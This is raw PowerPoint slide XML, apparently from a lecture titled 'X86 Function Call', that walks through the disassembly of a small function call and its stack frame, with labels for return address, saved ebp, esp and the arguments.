            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FF26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80483f6:	6a 01                	push   $0x1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80483f8:	e8 de ff ff ff       	call   80483db &lt;f&gt;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2600"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:t>80483fd:	83 c4 08             	add    $0x8,%esp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8048406:	c3                   	ret</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="366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pSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="391" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="15033130" y="3709710"/>
            <a:ext cx="6945838" cy="9613861"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="6945837" cy="9613859"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="367" name="rutern address"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2438192" y="6911378"/>
              <a:ext cx="305205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rutern address</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="368" name="prev ebp point"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2476007" y="6073178"/>
              <a:ext cx="300182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prev ebp point</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="369" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2159410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0" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2159410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1" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2159410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2" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2159410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3" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2159410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4" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2159410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5" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2159410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6" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2159410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7" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2159410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8" name="stack"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3391299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379" name="…"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3696248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380" name="…"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3696248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381" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2159410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2" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2159410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3" name="0x2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3556275" y="85877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0x2</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="384" name="ebp"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8621" y="8976319"/>
              <a:ext cx="99398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 </a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="385" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="956169" y="92950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esp"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="81381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387" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="961279" y="8494989"/>
              <a:ext cx="1078458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Low"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5901388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389" name="High"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5901401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390" name="0xf0"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5901388" y="7299919"/>
              <a:ext cx="96831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X86 Function Call"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="790874" y="1453761"/>
            <a:ext cx="7792602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X86 Function Call</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="394" name="080483db &lt;f&gt;:…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2794000" y="3937000"/>
            <a:ext cx="11101609" cy="954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080483db &lt;f&gt;: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80483de:	83 ec 50             	sub    $0x50,%esp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80483e1:	8b 55 08             	mov    0x8(%ebp),%edx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80483ef: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80483f0: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080483f1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80483f4:	6a 02                	push   $0x2</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FF26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80483f6:	6a 01                	push   $0x1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rgbClr val="FF2600"/>
                </a:solidFill>
              </a:rPr>
              <a:t>80483f8:	e8 de ff ff ff       	call   80483db &lt;f&gt;</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FF26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2600"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:t>80483fd:	83 c4 08             	add    $0x8,%esp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8048406:	c3                   	ret</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="395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396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0xf8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0xf0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0x80483f8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422" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="15041751" y="3709710"/>
            <a:ext cx="6937217" cy="9613861"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="6937215" cy="9613859"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="397" name="rutern address"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2429571" y="6911378"/>
              <a:ext cx="305205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rutern address</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="398" name="prev ebp point"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2467385" y="6073178"/>
              <a:ext cx="300182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prev ebp point</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="399" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="215078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0" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2150789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1" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2150789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2" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2150789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3" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2150789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4" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2150789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5" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2150789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6" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2150789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7" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2150789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8" name="stack"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3382678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409" name="…"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3687627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410" name="…"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3687627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411" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2150789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2" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="215078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3" name="0x2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3547654" y="85877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0x2</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="414" name="0x1"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3547654" y="77495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0x1</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="415" name="ebp"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="8976319"/>
              <a:ext cx="99398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 </a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="416" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="947548" y="92950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7" name="esp"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12" y="72999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948591" y="7682189"/>
              <a:ext cx="1078458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Low"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5892767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420" name="High"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5892779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421" name="0xf0"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5892767" y="72999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X86 Function Call"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="790874" y="1453761"/>
            <a:ext cx="7792602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X86 Function Call</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="425" name="080483db &lt;f&gt;:…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2794000" y="3937000"/>
            <a:ext cx="11101609" cy="954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080483db &lt;f&gt;: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80483de:	83 ec 50             	sub    $0x50,%esp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80483e1:	8b 55 08             	mov    0x8(%ebp),%edx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80483ef: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80483f0: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080483f1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80483f4:	6a 02                	push   $0x2</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FF26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80483f6:	6a 01                	push   $0x1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80483f8:	e8 de ff ff ff       	call   80483db &lt;f&gt;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2600"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:t>80483fd:	83 c4 08             	add    $0x8,%esp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8048406:	c3                   	ret</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="426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427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0xf8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0xec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0x80483db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453" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="15041751" y="3709710"/>
            <a:ext cx="6937217" cy="9613861"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="6937215" cy="9613859"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="428" name="esp"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12" y="644018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429" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="947548" y="6822458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Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="215078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1" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2150789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2" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2150789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3" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2150789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4" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2150789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5" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2150789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6" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2150789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7" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2150789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2150789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9" name="stack"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3382678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440" name="0x80483fd"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2848460" y="6911378"/>
              <a:ext cx="223967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0x80483fd</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="441" name="…"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3687627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442" name="…"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3687627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443" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2150789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Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="215078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5" name="0x2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3547654" y="85877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0x2</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="446" name="0x1"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3547654" y="77495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0x1</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="447" name="ebp"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="8976319"/>
              <a:ext cx="99398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 </a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="448" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="947548" y="92950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prev ebp point"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2467385" y="6073178"/>
              <a:ext cx="300182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prev ebp point</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="450" name="Low"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5892767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451" name="High"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5892779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452" name="0xf0"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5892767" y="72999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X86 Function Call"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="790874" y="1453761"/>
            <a:ext cx="7792602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X86 Function Call</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="456" name="080483db &lt;f&gt;:…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2794000" y="3937000"/>
            <a:ext cx="11101609" cy="954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080483db &lt;f&gt;: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80483de:	83 ec 50             	sub    $0x50,%esp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80483e1:	8b 55 08             	mov    0x8(%ebp),%edx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80483ef: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80483f0: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080483f1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80483f4:	6a 02                	push   $0x2</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FF26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80483f6:	6a 01                	push   $0x1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80483f8:	e8 de ff ff ff       	call   80483db &lt;f&gt;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2600"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:t>80483fd:	83 c4 08             	add    $0x8,%esp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8048406:	c3                   	ret</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="457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458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0xf8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0x80483dc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484" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="15036800" y="3709710"/>
            <a:ext cx="6942168" cy="9613861"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="6942167" cy="9613859"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="459" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2155741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0" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2155741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1" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2155741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2" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2155741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3" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2155741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4" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2155741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5" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2155741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6" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2155741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7" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2155741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8" name="stack"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3387630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469" name="0x80483fd"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2853411" y="6911378"/>
              <a:ext cx="223967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0x80483fd</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="470" name="0xf8"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3489094" y="6051216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0xf8</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="471" name="…"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3692579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472" name="…"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3692579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473" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2155741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4" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2155741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5" name="0x2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3552606" y="85877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0x2</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="476" name="0x1"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3552606" y="77495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0x1</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="477" name="esp"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="5582840"/>
              <a:ext cx="84128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</a:t>
              </a:r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952500" y="59803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9" name="ebp"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4951" y="8976319"/>
              <a:ext cx="99398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 </a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="480" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="952500" y="92950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1" name="Low"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5897719" y="594319"/>
              <a:ext cx="94286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482" name="High"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5897731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483" name="0xf0"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5897719" y="72999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X86 Function Call"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="790874" y="1453761"/>
            <a:ext cx="7792602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X86 Function Call</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="487" name="080483db &lt;f&gt;:…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2794000" y="3937000"/>
            <a:ext cx="11101609" cy="954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080483db &lt;f&gt;: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80483dc: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rgbClr val="FF2600"/>
                </a:solidFill>
              </a:rPr>
              <a:t>80483de:	83 ec 50             	sub    $0x50,%esp</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FF26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80483e1:	8b 55 08             	mov    0x8(%ebp),%edx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80483ef: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80483f0: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080483f1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80483f4:	6a 02                	push   $0x2</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FF26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80483f6:	6a 01                	push   $0x1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80483f8:	e8 de ff ff ff       	call   80483db &lt;f&gt;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2600"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:t>80483fd:	83 c4 08             	add    $0x8,%esp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8048406:	c3                   	ret</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="488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489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0x80483de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513" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="14185230" y="3709710"/>
            <a:ext cx="7793738" cy="9613861"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="7793737" cy="9613859"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="490" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3007311" y="7647978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1" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3007311" y="6809778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2" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3007311" y="5958878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3" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3007311" y="5133378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4" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3007311" y="4295178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5" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3007311" y="3444278"/>
              <a:ext cx="3635016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6" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3007311" y="2604359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7" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3007311" y="1766159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8" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3007311" y="938940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9" name="stack"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4239200" y="0"/>
              <a:ext cx="1171238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500" name="Low"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6749288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501" name="High"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6749301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502" name="0x80483fd"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
